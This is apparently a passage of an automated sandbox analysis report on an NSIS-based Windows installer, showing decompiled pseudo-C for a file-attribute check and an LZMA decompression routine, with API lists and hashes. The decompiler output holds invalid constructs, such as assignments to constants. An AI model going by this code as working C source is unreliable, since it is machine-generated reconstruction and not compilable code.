                                  				intOrPtr* _t21;
                                  				signed int _t23;
                                  
                                  				E00406507(0x425f10, _a4);
                                  				_t21 = E00405E81(0x425f10);
                                  				if(_t21 != 0) {
                                  					E0040678E(_t21);
                                  					if(( *0x42a238 & 0x00000080) == 0) {
                                  						L5:
                                  						_t23 = _t21 - 0x425f10 >> 1;
                                  						while(1) {
                                  							_t11 = lstrlenW(0x425f10);
                                  							_push(0x425f10);
                                  							if(_t11 <= _t23) {
                                  								break;
                                  							}
                                  							_t12 = E0040683D();
                                  							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                  								E00405E22(0x425f10);
                                  								continue;
                                  							} else {
                                  								goto L1;
                                  							}
                                  						}
                                  						E00405DD6();
                                  						_t16 = GetFileAttributesW(??); // executed
                                  						return 0 | _t16 != 0xffffffff;
                                  					}
                                  					_t18 =  *_t21;
                                  					if(_t18 == 0 || _t18 == 0x5c) {
                                  						goto L1;
                                  					} else {
                                  						goto L5;
                                  					}
                                  				}
                                  				L1:
                                  				return 0;
                                  			}










                                  APIs
                                    • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                                    • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                    • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                    • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                  • lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
                                  • GetFileAttributesW.KERNELBASE(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,7620FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,7620FAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F47
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 3248276644-3916508600
                                  • Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                  • Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
                                  • Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
                                  • Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph (function 00407033; node legend: Executed / Not Executed)
                                  C-Code - Quality: 99%
                                  			E00407033() {
                                  				signed int _t530;
                                  				void _t537;
                                  				signed int _t538;
                                  				signed int _t539;
                                  				unsigned short _t569;
                                  				signed int _t579;
                                  				signed int _t607;
                                  				void* _t627;
                                  				signed int _t628;
                                  				signed int _t635;
                                  				signed int* _t643;
                                  				void* _t644;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					_t530 =  *(_t644 - 0x30);
                                  					if(_t530 >= 4) {
                                  					}
                                  					 *(_t644 - 0x40) = 6;
                                  					 *(_t644 - 0x7c) = 0x19;
                                  					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                  					while(1) {
                                  						L145:
                                  						 *(_t644 - 0x50) = 1;
                                  						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                  						while(1) {
                                  							L149:
                                  							if( *(_t644 - 0x48) <= 0) {
                                  								goto L155;
                                  							}
                                  							L150:
                                  							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                  							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                  							 *(_t644 - 0x54) = _t643;
                                  							_t569 =  *_t643;
                                  							_t635 = _t569 & 0x0000ffff;
                                  							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                  							if( *(_t644 - 0xc) >= _t607) {
                                  								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                  								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                  								_t628 = _t627 + 1;
                                  								 *_t643 = _t569 - (_t569 >> 5);
                                  								 *(_t644 - 0x50) = _t628;
                                  							} else {
                                  								 *(_t644 - 0x10) = _t607;
                                  								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                  								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                  							}
                                  							if( *(_t644 - 0x10) >= 0x1000000) {
                                  								L148:
                                  								_t487 = _t644 - 0x48;
                                  								 *_t487 =  *(_t644 - 0x48) - 1;
                                  								L149:
                                  								if( *(_t644 - 0x48) <= 0) {
                                  									goto L155;
                                  								}
                                  								goto L150;
                                  							} else {
                                  								L154:
                                  								L146:
                                  								if( *(_t644 - 0x6c) == 0) {
                                  									L169:
                                  									 *(_t644 - 0x88) = 0x18;
                                  									L170:
                                  									_t579 = 0x22;
                                  									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                  									_t539 = 0;
                                  									L172:
                                  									return _t539;
                                  								}
                                  								L147:
                                  								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                  								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                  								_t484 = _t644 - 0x70;
                                  								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                  								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                  								goto L148;
                                  							}
                                  							L155:
                                  							_t537 =  *(_t644 - 0x7c);
                                  							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                  							while(1) {
                                  								L140:
                                  								 *(_t644 - 0x88) = _t537;
                                  								while(1) {
                                  									L1:
                                  									_t538 =  *(_t644 - 0x88);
                                  									if(_t538 > 0x1c) {
                                  										break;
                                  									}
                                  									L2:
                                  									switch( *((intOrPtr*)(_t538 * 4 +  &M004074A1))) {
                                  										case 0:
                                  											L3:
                                  											if( *(_t644 - 0x6c) == 0) {
                                  												goto L170;
                                  											}
                                  											L4:
                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                  											_t538 =  *( *(_t644 - 0x70));
                                  											if(_t538 > 0xe1) {
                                  												goto L171;
                                  											}
                                  											L5:
                                  											_t542 = _t538 & 0x000000ff;
                                  											_push(0x2d);
                                  											asm("cdq");
                                  											_pop(_t581);
                                  											_push(9);
                                  											_pop(_t582);
                                  											_t638 = _t542 / _t581;
                                  											_t544 = _t542 % _t581 & 0x000000ff;
                                  											asm("cdq");
                                  											_t633 = _t544 % _t582 & 0x000000ff;
                                  											 *(_t644 - 0x3c) = _t633;
                                  											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                  											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                  											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                  											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                  												L10:
                                  												if(_t641 == 0) {
                                  													L12:
                                  													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                  													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                  													goto L15;
                                  												} else {
                                  													goto L11;
                                  												}
                                  												do {
                                  													L11:
                                  													_t641 = _t641 - 1;
                                  													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                  												} while (_t641 != 0);
                                  												goto L12;
                                  											}
                                  											L6:
                                  											if( *(_t644 - 4) != 0) {
                                  												GlobalFree( *(_t644 - 4));
                                  											}
                                  											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                  											 *(_t644 - 4) = _t538;
                                  											if(_t538 == 0) {
                                  												goto L171;
                                  											} else {
                                  												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                  												goto L10;
                                  											}
                                  										case 1:
                                  											L13:
                                  											__eflags =  *(_t644 - 0x6c);
                                  											if( *(_t644 - 0x6c) == 0) {
                                  												L157:
                                  												 *(_t644 - 0x88) = 1;
                                  												goto L170;
                                  											}
                                  											L14:
                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                  											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                  											_t45 = _t644 - 0x48;
                                  											 *_t45 =  *(_t644 - 0x48) + 1;
                                  											__eflags =  *_t45;
                                  											L15:
                                  											if( *(_t644 - 0x48) < 4) {
                                  												goto L13;
                                  											}
                                  											L16:
                                  											_t550 =  *(_t644 - 0x40);
                                  											if(_t550 ==  *(_t644 - 0x74)) {
                                  												L20:
                                  												 *(_t644 - 0x48) = 5;
                                  												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                  												goto L23;
                                  											}
                                  											L17:
                                  											 *(_t644 - 0x74) = _t550;
                                  											if( *(_t644 - 8) != 0) {
                                  												GlobalFree( *(_t644 - 8)); // executed
                                  											}
                                  											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                  											 *(_t644 - 8) = _t538;
                                  											if(_t538 == 0) {
                                  												goto L171;
                                  											} else {
                                  												goto L20;
                                  											}
                                  										case 2:
                                  											L24:
                                  											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                  											 *(_t644 - 0x84) = 6;
                                  											 *(_t644 - 0x4c) = _t557;
                                  											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                  											goto L132;
                                  										case 3:
                                  											L21:
                                  											__eflags =  *(_t644 - 0x6c);
                                  											if( *(_t644 - 0x6c) == 0) {
                                  												L158:
                                  												 *(_t644 - 0x88) = 3;
                                  												goto L170;
                                  											}
                                  											L22:
                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                  											_t67 = _t644 - 0x70;
                                  											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                  											__eflags =  *_t67;
                                  											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                  											L23:
                                  											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                  											if( *(_t644 - 0x48) != 0) {
                                  												goto L21;
                                  											}
                                  											goto L24;
                                  										case 4:
                                  											L133:
                                  											_t559 =  *_t642;
                                  											_t626 = _t559 & 0x0000ffff;
                                  											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                  											if( *(_t644 - 0xc) >= _t596) {
                                  												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                  												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                  												 *(_t644 - 0x40) = 1;
                                  												_t560 = _t559 - (_t559 >> 5);
                                  												__eflags = _t560;
                                  												 *_t642 = _t560;
                                  											} else {
                                  												 *(_t644 - 0x10) = _t596;
                                  												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                  												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                  											}
                                  											if( *(_t644 - 0x10) >= 0x1000000) {
                                  												goto L139;
                                  											} else {
                                  												goto L137;
                                  											}
                                  										case 5:
                                  											L137:
                                  											if( *(_t644 - 0x6c) == 0) {
                                  												L168:
                                  												 *(_t644 - 0x88) = 5;
                                  												goto L170;
                                  											}
                                  											L138:
                                  											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                  											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                  											L139:
                                  											_t537 =  *(_t644 - 0x84);
                                  											L140:
                                  											 *(_t644 - 0x88) = _t537;
                                  											goto L1;
                                  										case 6:
                                  											L25:
                                  											__edx = 0;
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												L36:
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) = 1;
                                  												 *(__ebp - 0x84) = 7;
                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                  												goto L132;
                                  											}
                                  											L26:
                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                  											__esi =  *(__ebp - 0x60);
                                  											__cl = 8;
                                  											__cl = 8 -  *(__ebp - 0x3c);
                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                  											__ecx =  *(__ebp - 0x3c);
                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                  											__ecx =  *(__ebp - 4);
                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                  											__eflags =  *(__ebp - 0x38) - 4;
                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  											if( *(__ebp - 0x38) >= 4) {
                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                  												if( *(__ebp - 0x38) >= 0xa) {
                                  													_t98 = __ebp - 0x38;
                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                  													__eflags =  *_t98;
                                  												} else {
                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                  												}
                                  											} else {
                                  												 *(__ebp - 0x38) = 0;
                                  											}
                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                  											if( *(__ebp - 0x34) == __edx) {
                                  												L35:
                                  												__ebx = 0;
                                  												__ebx = 1;
                                  												goto L61;
                                  											} else {
                                  												L32:
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__ecx =  *(__ebp - 8);
                                  												__ebx = 0;
                                  												__ebx = 1;
                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                  												goto L41;
                                  											}
                                  										case 7:
                                  											L66:
                                  											__eflags =  *(__ebp - 0x40) - 1;
                                  											if( *(__ebp - 0x40) != 1) {
                                  												L68:
                                  												__eax =  *(__ebp - 0x24);
                                  												 *(__ebp - 0x80) = 0x16;
                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  												__eax =  *(__ebp - 0x28);
                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  												__eax =  *(__ebp - 0x2c);
                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  												__eax = 0;
                                  												__eflags =  *(__ebp - 0x38) - 7;
                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  												__al = __al & 0x000000fd;
                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                  												__eax =  *(__ebp - 4);
                                  												__eax =  *(__ebp - 4) + 0x664;
                                  												__eflags = __eax;
                                  												 *(__ebp - 0x58) = __eax;
                                  												goto L69;
                                  											}
                                  											L67:
                                  											__eax =  *(__ebp - 4);
                                  											__ecx =  *(__ebp - 0x38);
                                  											 *(__ebp - 0x84) = 8;
                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                  											goto L132;
                                  										case 8:
                                  											L70:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x84) = 0xa;
                                  												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                  											} else {
                                  												__eax =  *(__ebp - 0x38);
                                  												__ecx =  *(__ebp - 4);
                                  												__eax =  *(__ebp - 0x38) + 0xf;
                                  												 *(__ebp - 0x84) = 9;
                                  												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                  												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                  											}
                                  											goto L132;
                                  										case 9:
                                  											L73:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												goto L90;
                                  											}
                                  											L74:
                                  											__eflags =  *(__ebp - 0x60);
                                  											if( *(__ebp - 0x60) == 0) {
                                  												goto L171;
                                  											}
                                  											L75:
                                  											__eax = 0;
                                  											__eflags =  *(__ebp - 0x38) - 7;
                                  											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                  											__eflags = _t259;
                                  											0 | _t259 = _t259 + _t259 + 9;
                                  											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                  											goto L76;
                                  										case 0xa:
                                  											L82:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												L84:
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x84) = 0xb;
                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                  												goto L132;
                                  											}
                                  											L83:
                                  											__eax =  *(__ebp - 0x28);
                                  											goto L89;
                                  										case 0xb:
                                  											L85:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__ecx =  *(__ebp - 0x24);
                                  												__eax =  *(__ebp - 0x20);
                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  											} else {
                                  												__eax =  *(__ebp - 0x24);
                                  											}
                                  											__ecx =  *(__ebp - 0x28);
                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  											L89:
                                  											__ecx =  *(__ebp - 0x2c);
                                  											 *(__ebp - 0x2c) = __eax;
                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  											L90:
                                  											__eax =  *(__ebp - 4);
                                  											 *(__ebp - 0x80) = 0x15;
                                  											__eax =  *(__ebp - 4) + 0xa68;
                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                  											goto L69;
                                  										case 0xc:
                                  											L99:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												L164:
                                  												 *(__ebp - 0x88) = 0xc;
                                  												goto L170;
                                  											}
                                  											L100:
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t334 = __ebp - 0x70;
                                  											 *_t334 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t334;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											__eax =  *(__ebp - 0x2c);
                                  											goto L101;
                                  										case 0xd:
                                  											L37:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												L159:
                                  												 *(__ebp - 0x88) = 0xd;
                                  												goto L170;
                                  											}
                                  											L38:
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t122 = __ebp - 0x70;
                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t122;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L39:
                                  											__eax =  *(__ebp - 0x40);
                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                  												goto L48;
                                  											}
                                  											L40:
                                  											__eflags = __ebx - 0x100;
                                  											if(__ebx >= 0x100) {
                                  												goto L54;
                                  											}
                                  											L41:
                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                  											__ecx =  *(__ebp - 0x58);
                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                  											 *(__ebp - 0x48) = __eax;
                                  											__eax = __eax + 1;
                                  											__eax = __eax << 8;
                                  											__eax = __eax + __ebx;
                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  											__ax =  *__esi;
                                  											 *(__ebp - 0x54) = __esi;
                                  											__edx = __ax & 0x0000ffff;
                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                  											if( *(__ebp - 0xc) >= __ecx) {
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  												__cx = __ax;
                                  												 *(__ebp - 0x40) = 1;
                                  												__cx = __ax >> 5;
                                  												__eflags = __eax;
                                  												__ebx = __ebx + __ebx + 1;
                                  												 *__esi = __ax;
                                  											} else {
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                  												 *(__ebp - 0x10) = __ecx;
                                  												0x800 = 0x800 - __edx;
                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  												__ebx = __ebx + __ebx;
                                  												 *__esi = __cx;
                                  											}
                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  											 *(__ebp - 0x44) = __ebx;
                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                  												goto L39;
                                  											} else {
                                  												L45:
                                  												goto L37;
                                  											}
                                  										case 0xe:
                                  											L46:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												L160:
                                  												 *(__ebp - 0x88) = 0xe;
                                  												goto L170;
                                  											}
                                  											L47:
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t156 = __ebp - 0x70;
                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t156;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											while(1) {
                                  												L48:
                                  												__eflags = __ebx - 0x100;
                                  												if(__ebx >= 0x100) {
                                  													break;
                                  												}
                                  												L49:
                                  												__eax =  *(__ebp - 0x58);
                                  												__edx = __ebx + __ebx;
                                  												__ecx =  *(__ebp - 0x10);
                                  												__esi = __edx + __eax;
                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                  												__ax =  *__esi;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__edi = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													_t170 = __edx + 1; // 0x1
                                  													__ebx = _t170;
                                  													__cx = __ax >> 5;
                                  													__eflags = __eax;
                                  													 *__esi = __ax;
                                  												} else {
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edi;
                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  													__ebx = __ebx + __ebx;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													continue;
                                  												} else {
                                  													L53:
                                  													goto L46;
                                  												}
                                  											}
                                  											L54:
                                  											_t173 = __ebp - 0x34;
                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                  											__eflags =  *_t173;
                                  											goto L55;
                                  										case 0xf:
                                  											L58:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												L161:
                                  												 *(__ebp - 0x88) = 0xf;
                                  												goto L170;
                                  											}
                                  											L59:
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t203 = __ebp - 0x70;
                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t203;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L60:
                                  											__eflags = __ebx - 0x100;
                                  											if(__ebx >= 0x100) {
                                  												L55:
                                  												__al =  *(__ebp - 0x44);
                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                  												goto L56;
                                  											}
                                  											L61:
                                  											__eax =  *(__ebp - 0x58);
                                  											__edx = __ebx + __ebx;
                                  											__ecx =  *(__ebp - 0x10);
                                  											__esi = __edx + __eax;
                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                  											__ax =  *__esi;
                                  											 *(__ebp - 0x54) = __esi;
                                  											__edi = __ax & 0x0000ffff;
                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                  											if( *(__ebp - 0xc) >= __ecx) {
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  												__cx = __ax;
                                  												_t217 = __edx + 1; // 0x1
                                  												__ebx = _t217;
                                  												__cx = __ax >> 5;
                                  												__eflags = __eax;
                                  												 *__esi = __ax;
                                  											} else {
                                  												 *(__ebp - 0x10) = __ecx;
                                  												0x800 = 0x800 - __edi;
                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  												__ebx = __ebx + __ebx;
                                  												 *__esi = __cx;
                                  											}
